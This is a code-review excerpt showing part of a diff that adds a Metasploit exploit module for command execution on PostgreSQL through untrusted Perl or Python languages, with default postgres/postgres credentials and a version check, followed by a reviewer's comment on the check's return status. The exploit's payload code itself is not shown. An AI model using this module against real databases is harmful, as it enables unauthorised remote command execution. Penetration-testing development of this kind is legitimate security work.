modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,258 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/postgres'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Auxiliary::Report
+
+  # Creates an instance of this module.
+  def initialize(info = {})
+    super(update_info(info,
+          'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+          'Description' => %q(
+            Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
+            Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
+            To execute system commands, loading the "untrusted" version of the language is necessary.
+            This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
+            and has been tested on OS X, Windows, and Linux.
+
+            This module attempts to load Perl or Python to execute system commands. As this dynamically loads
+            a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
+
+            Only Postgres 8 and up are supported.
+          ),
+          'Author' => [
+            'Micheal Cottingham', # author of this module
+            'midnitesnake', # the postgres_payload module that this is based on
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+          ],
+          'Platform' => %w(linux unix win osx),
+          'Payload' => {
+            'PayloadType' => %w(cmd)
+          },
+          'Arch' => [ARCH_CMD],
+          'Targets' => [
+            ['Automatic', {}]
+          ],
+          'DefaultTarget' => 0,
+          'DisclosureDate' => 'Jan 1 2016')
+        )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
+      OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
+    ], self.class)
+
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+  end
+
+  def check
+    version = postgres_fingerprint
+
+    if version[:auth]
+      version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+      major_version = version_match['major_version']
+
+      if major_version.to_i >= 8
+        return CheckCode::Appears
+
+      else
+        print_error "#{rhost}:#{rport} - Unsupported version - #{version[:auth]}"
+        return CheckCode::Safe
+      end
+
+    else
+      print_error "#{rhost}:#{rport} - Authentication failed"
+      return CheckCode::Safe
```

Comment:
Is there a more appropriate status than this?  I think `CheckCode::Unknown` may be more appropriate.